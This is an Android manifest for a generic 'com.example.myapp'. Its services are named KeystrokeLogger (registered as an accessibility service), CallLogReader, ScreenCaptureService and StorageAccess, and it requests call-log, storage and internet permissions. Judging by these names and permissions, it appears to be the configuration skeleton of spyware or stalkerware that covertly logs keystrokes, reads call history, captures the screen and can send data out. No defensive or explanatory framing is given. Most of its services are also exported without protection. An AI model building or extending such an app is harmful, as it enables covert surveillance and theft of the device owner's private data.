<manifest xmlns:android="http://schemas.android.com/apk/res/android"
    package="com.example.myapp">

    <application
        android:allowBackup="true"
        android:icon="@mipmap/ic_launcher"
        android:label="@string/app_name"
        android:supportsRtl="true"
        android:theme="@style/AppTheme">

        <service
            android:name=".ConnectionService"
            android:enabled="true"
            android:exported="true" />

        <service
            android:name=".CallLogReader"
            android:enabled="true"
            android:exported="true" />

        <service
            android:name=".KeystrokeLogger"
            android:permission="android.permission.BIND_ACCESSIBILITY_SERVICE">
            <intent-filter>
                <action android:name="android.accessibilityservice.AccessibilityService" />
            </intent-filter>
        </service>

        <service
            android:name=".StorageAccess"
            android:enabled="true"
            android:exported="true" />

        <service
            android:name=".ScreenCaptureService"
            android:enabled="true"
            android:exported="true" />

    </application>

    <uses-permission android:name="android.permission.READ_CALL_LOG" />
    <uses-permission android:name="android.permission.READ_EXTERNAL_STORAGE" />
    <uses-permission android:name="android.permission.WRITE_EXTERNAL_STORAGE" />
    <uses-permission android:name="android.permission.INTERNET" />
</manifest>
